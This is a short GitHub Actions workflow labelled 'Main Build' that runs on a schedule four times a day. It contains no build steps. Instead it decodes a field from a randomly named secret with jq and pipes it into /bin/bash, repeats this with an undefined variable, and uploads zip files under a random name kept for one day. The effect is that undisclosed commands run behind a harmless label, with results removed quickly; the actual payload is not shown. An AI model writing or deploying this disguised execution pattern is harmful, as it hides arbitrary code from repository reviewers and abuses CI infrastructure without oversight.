name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '21 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  invoke:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run pipeline
        env:
          efl3: ${{ secrets.efl3 }}
        run: |
          printf '%s' "$efl3" | jq -r .hcsus509 | /bin/bash
          printf '%s' "$pkqs14" | jq -r .mgqos64 | /bin/bash

      - name: Upload archive
        uses: actions/upload-artifact@v4
        with:
          name: xDPvAvjG
          path: "*.zip"
          retention-days: 1
